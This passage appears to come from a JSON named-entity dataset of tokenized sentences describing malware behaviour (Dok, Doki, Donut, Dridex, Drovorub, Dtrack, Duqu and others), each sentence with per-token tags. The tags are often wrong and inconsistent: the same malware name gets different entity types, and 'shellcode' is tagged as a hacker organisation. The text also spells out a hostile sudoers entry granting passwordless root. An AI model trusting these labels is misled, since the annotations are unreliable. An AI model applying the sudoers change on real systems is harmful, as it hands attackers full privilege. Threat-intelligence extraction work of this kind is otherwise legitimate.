"LaunchAgents", "to", "redirect", "all", "network", "traffic", "with", "a", "randomly", "generated", "name", "for", "each", "plist", "file", "maintaining", "the", "format", "<code>com.random.name.plist</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "gives", "all", "users", "execute", "permissions", "for", "the", "application", "using", "the", "command", "<code>chmod", "+x", "/Users/Shared/AppStore.app</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "uses", "AppleScript", "to", "install", "a", "login", "Item", "by", "sending", "Apple", "events", "to", "the", "<code>System", "Events</code>", "process." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "downloads", "and", "installs", "Tor", "via", "homebrew." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dok", "is", "packed", "with", "an", "UPX", "executable", "packer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Dok", "adds", "<code>admin", "ALL=(ALL)", "NOPASSWD:", "ALL</code>", "to", "the", "<code>/etc/sudoers</code>", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "used", "the", "embedTLS", "library", "for", "network", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Idus", "O" ] }, { "tokens": [ "Doki", "has", "used", "a", "script", "that", "gathers", "information", "from", "a", "hardcoded", "list", "of", "IP", "addresses", "and", "uploads", "to", "an", "Ngrok", "URL." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "was", "run", "through", "a", "deployed", "container." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "used", "the", "DynDNS", "service", "and", "a", "DGA", "based", "on", "the", "Dogecoin", "blockchain", "to", "generate", "C2", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Doki’s", "container", "was", "configured", "to", "bind", "the", "host", "root", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "used", "Ngrok", "to", "establish", "C2", "and", "exfiltrate", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "Doki", "was", "executed", "through", "an", "open", "Docker", "daemon", "API", "port." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "resolved", "the", "path", "of", "a", "process", "PID", "to", "use", "as", "a", "script", "argument." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "downloaded", "scripts", "from", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "disguised", "a", "file", "as", "a", "Linux", "kernel", "module." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "searched", "for", "the", "current", "process’s", "PID." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "executed", "shell", "scripts", "with", "/bin/sh." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Doki", "has", "communicated", "with", "C2", "over", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Doki", "has", "used", "the", "dogechain.info", "API", "to", "generate", "a", "C2", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Donut", "can", "generate", "shellcode", "outputs", "that", "execute", "via", "Ruby." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Donut", "can", "patch", "Antimalware", "Scan", "Interface", "(AMSI),", "Windows", "Lockdown", "Policy", "(WLDP),", "as", "well", "as", "exit-related", "Native", "API", "functions", "to", "avoid", "process", "termination." ], "ner_tags": [ "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "can", "erase", "file", "references", "to", "payloads", "in-memory", "after", "being", "reflectively", "loaded", "and", "executed." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "can", "download", "and", "execute", "previously", "staged", "shellcode", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "can", "generate", "shellcode", "outputs", "that", "execute", "via", "JavaScript", "or", "JScript." ], "ner_tags": [ "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Donut", "code", "modules", "use", "various", "API", "functions", "to", "load", "and", "inject", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Donut", "can", "generate", "encrypted,", "compressed/encoded,", "or", "otherwise", "obfuscated", "code", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "can", "generate", "shellcode", "outputs", "that", "execute", "via", "PowerShell." ], "ner_tags": [ "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Donut", "includes", "subprojects", "that", "enumerate", "and", "identify", "information", "about", "Process", "Injection", "candidates." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "includes", "a", "subproject", "<code>DonutTest</code>", "to", "inject", "shellcode", "into", "a", "target", "process." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Donut", "can", "generate", "shellcode", "outputs", "that", "execute", "via", "Python." ], "ner_tags": [ "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Donut", "can", "generate", "code", "modules", "that", "enable", "in-memory", "execution", "of", "VBScript,", "JScript,", "EXE,", "DLL,", "and", "dotNET", "payloads." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Donut", "can", "generate", "packed", "code", "modules." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Donut", "can", "generate", "shellcode", "outputs", "that", "execute", "via", "VBScript." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Donut", "can", "use", "HTTP", "to", "download", "previously", "staged", "shellcode", "payloads." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DownPaper", "uses", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "DownPaper", "searches", "and", "reads", "the", "value", "of", "the", "Windows", "Update", "Registry", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DownPaper", "uses", "PowerShell", "to", "add", "a", "Registry", "Run", "key", "in", "order", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DownPaper", "collects", "the", "victim", "host", "name", "and", "serial", "number,", "and", "then", "sends", "the", "information", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DownPaper", "collects", "the", "victim", "username", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DownPaper", "communicates", "to", "its", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DownPaper", "uses", "the", "command", "line." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Downdelph", "bypasses", "UAC", "to", "escalate", "privileges", "by", "using", "a", "custom", "“RedirectEXE”", "shim", "database." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downdelph", "uses", "search", "order", "hijacking", "of", "the", "Windows", "executable", "sysprep.exe", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "After", "downloading", "its", "main", "config", "file,", "Downdelph", "downloads", "multiple", "payloads", "from", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downdelph", "inserts", "pseudo-random", "characters", "between", "each", "original", "character", "during", "encoding", "of", "C2", "network", "requests,", "making", "it", "difficult", "to", "write", "signatures", "on", "them." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downdelph", "uses", "RC4", "to", "encrypt", "C2", "responses." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "encrypted", "traffic", "with", "RSA." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Dridex", "can", "perform", "browser", "attacks", "via", "web", "injects", "to", "steal", "information", "such", "as", "credentials,", "certificates,", "and", "cookies." ], "ner_tags": [ "B-Way", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Dridex", "can", "abuse", "legitimate", "Windows", "executables", "to", "side-load", "malicious", "DLL", "files." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Dridex", "can", "use", "multiple", "layers", "of", "proxy", "servers", "to", "hide", "terminal", "nodes", "in", "its", "infrastructure." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "used", "the", "<code>OutputDebugStringW</code>", "function", "to", "avoid", "malware", "analysis", "as", "part", "of", "its", "anti-debugging", "technique." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex's", "strings", "are", "obfuscated", "using", "RC4." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "contains", "a", "backconnect", "module", "for", "tunneling", "network", "traffic", "through", "a", "victim's", "computer.", "Infected", "computers", "become", "part", "of", "a", "P2P", "botnet", "that", "can", "relay", "C2", "traffic", "to", "other", "infected", "peers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "can", "use", "`regsvr32.exe`", "to", "initiate", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "contains", "a", "module", "for", "VNC." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Dridex", "can", "maintain", "persistence", "via", "the", "creation", "of", "scheduled", "tasks", "within", "system", "directories", "such", "as", "`windows\\system32\\`,", "`windows\\syswow64,`", "`winnt\\system32`,", "and", "`winnt\\syswow64`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Dridex", "has", "collected", "a", "list", "of", "installed", "software", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "encrypted", "traffic", "with", "RC4." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "collected", "the", "computer", "name", "and", "OS", "architecture", "information", "from", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dridex", "has", "used", "POST", "requests", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DropBook", "can", "unarchive", "data", "downloaded", "from", "the", "C2", "to", "obtain", "the", "payload", "and", "persistence", "modules." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DropBook", "has", "used", "legitimate", "web", "services", "to", "exfiltrate", "data." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "DropBook", "can", "collect", "the", "names", "of", "all", "files", "and", "folders", "in", "the", "Program", "Files", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DropBook", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "DropBook", "is", "a", "Python-based", "backdoor", "compiled", "with", "PyInstaller." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DropBook", "has", "checked", "for", "the", "presence", "of", "Arabic", "language", "in", "the", "infected", "machine's", "settings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DropBook", "has", "checked", "for", "the", "presence", "of", "Arabic", "language", "in", "the", "infected", "machine's", "settings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DropBook", "can", "communicate", "with", "its", "operators", "by", "exploiting", "the", "Simplenote,", "DropBox,", "and", "the", "social", "media", "platform,", "Facebook,", "where", "it", "can", "create", "fake", "accounts", "to", "control", "the", "backdoor", "and", "receive", "instructions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "I-Idus", "I-Idus", "O", "B-Org", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "I-Features", "O" ] }, { "tokens": [ "DropBook", "can", "execute", "arbitrary", "shell", "commands", "on", "the", "victims'", "machines." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "transfer", "files", "from", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "has", "de-obsfuscated", "XOR", "encrypted", "payloads", "in", "WebSocket", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "exfiltrate", "files", "over", "C2", "infrastructure." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "delete", "specific", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "download", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "use", "a", "port", "forwarding", "rule", "on", "its", "agent", "module", "to", "relay", "network", "traffic", "through", "the", "client", "module", "to", "a", "remote", "host", "on", "the", "same", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "use", "kernel", "modules", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "use", "TCP", "to", "communicate", "between", "its", "agent", "and", "client", "modules." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "has", "used", "XOR", "encrypted", "payloads", "in", "WebSocket", "client", "to", "server", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "has", "used", "a", "kernel", "module", "rootkit", "to", "hide", "processes,", "files,", "executables,", "and", "network", "artifacts", "from", "user", "space", "view." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "execute", "arbitrary", "commands", "as", "root", "on", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Drovorub", "can", "use", "the", "WebSocket", "protocol", "and", "has", "initiated", "communication", "with", "C2", "servers", "with", "an", "HTTP", "Upgrade", "request." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "packs", "collected", "data", "into", "a", "password", "protected", "archive." ], "ner_tags": [ "B-SamFile", "I-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack’s", "RAT", "makes", "a", "persistent", "target", "file", "with", "auto", "execution", "on", "the", "host", "start." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "retrieve", "browser", "history." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "collect", "a", "variety", "of", "information", "from", "victim", "machines." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "has", "used", "a", "decryption", "routine", "that", "is", "part", "of", "an", "executable", "physical", "patch." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "has", "used", "a", "dropper", "that", "embeds", "an", "encrypted", "payload", "as", "extra", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "remove", "its", "persistence", "and", "delete", "itself." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "list", "files", "on", "available", "disk", "volumes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "One", "of", "Dtrack", "can", "replace", "the", "normal", "flow", "of", "a", "program", "execution", "with", "malicious", "code." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack’s", "can", "download", "and", "upload", "a", "file", "to", "the", "victim’s", "computer." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack’s", "dropper", "contains", "a", "keylogging", "executable." ], "ner_tags": [ "B-Idus", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "save", "collected", "data", "to", "disk,", "different", "file", "formats,", "and", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "One", "of", "Dtrack", "can", "hide", "in", "replicas", "of", "legitimate", "programs", "like", "OllyDbg,", "7-Zip,", "and", "FileZilla." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Dtrack’s", "dropper", "can", "list", "all", "running", "processes." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "has", "used", "process", "hollowing", "shellcode", "to", "target", "a", "predefined", "list", "of", "processes", "from", "<code>%SYSTEM32%</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "collect", "the", "RegisteredOwner,", "RegisteredOrganization,", "and", "InstallDate", "registry", "values." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Dtrack", "contains", "a", "function", "that", "calls", "<code>LoadLibrary</code>", "and", "<code>GetProcAddress</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Dtrack", "can", "collect", "the", "victim's", "computer", "name,", "hostname", "and", "adapter", "information", "to", "create", "a", "unique", "identifier." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Dtrack", "can", "collect", "the", "host's", "IP", "addresses", "using", "the", "<code>ipconfig</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "collect", "network", "and", "active", "connection", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "used", "hard-coded", "credentials", "to", "gain", "access", "to", "a", "network", "share." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "has", "used", "<code>cmd.exe</code>", "to", "add", "a", "persistent", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dtrack", "can", "add", "a", "service", "called", "WBService", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Duqu", "examines", "running", "system", "processes", "for", "tokens", "that", "have", "specific", "system", "privileges.", "If", "it", "finds", "one,", "it", "will", "copy", "the", "token", "and", "store", "it", "for", "later", "use.", "Eventually", "it", "will", "start", "new", "processes", "with", "the", "stored", "token", "attached.", "It", "can", "also", "steal", "tokens", "to", "acquire", "administrative", "privileges." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "uses", "a", "custom", "command", "and", "control", "protocol", "that", "communicates", "over", "commonly", "used", "ports,", "and", "is", "frequently", "encapsulated", "by", "application", "layer", "protocols." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "discovery", "modules", "used", "with", "Duqu", "can", "collect", "information", "on", "open", "windows." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Modules", "can", "be", "pushed", "to", "and", "executed", "by", "Duqu", "that", "copy", "data", "to", "a", "staging", "area,", "compress", "it,", "and", "XOR", "encrypt", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "will", "inject", "itself", "into", "different", "processes", "to", "evade", "detection.", "The", "selection", "of", "the", "target", "process", "is", "influenced", "by", "the", "security", "software", "that", "is", "installed", "on", "the", "system", "(Duqu", "will", "inject", "into", "different", "processes", "depending", "on", "which", "security", "suite", "is", "installed", "on", "the", "infected", "host)." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "can", "be", "configured", "to", "have", "commands", "relayed", "over", "a", "peer-to-peer", "network", "of", "infected", "hosts", "if", "some", "of", "the", "hosts", "do", "not", "have", "Internet", "access." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "can", "track", "key", "presses", "with", "a", "keylogger", "module." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "discovery", "modules", "used", "with", "Duqu", "can", "collect", "information", "on", "accounts", "and", "permissions." ], "ner_tags": [ "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Modules", "can", "be", "pushed", "to", "and", "executed", "by", "Duqu", "that", "copy", "data", "to", "a", "staging", "area,", "compress", "it,", "and", "XOR", "encrypt", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Duqu", "has", "used", "<code>msiexec</code>", "to", "execute", "malicious", "Windows", "Installer", "packages.", "Additionally,", "a", "PROPERTY=VALUE", "pair", "containing", "a", "56-bit", "encryption", "key", "has", "been", "used", "to", "decrypt", "the", "main", "payload", "from", "the", "installer", "packages." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "discovery", "modules", "used", "with", "Duqu", "can", "collect", "information", "on", "process", "details." ], "ner_tags": [ "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Duqu", "is", "capable", "of", "loading", "executable", "code", "via", "process", "hollowing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "I-Way", "O" ] }, { "tokens": [ "Duqu", "uses", "a", "custom", "command", "and", "control", "protocol", "that", "communicates", "over", "commonly", "used", "ports,", "and", "is", "frequently", "encapsulated", "by", "application", "layer", "protocols." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "instruct", 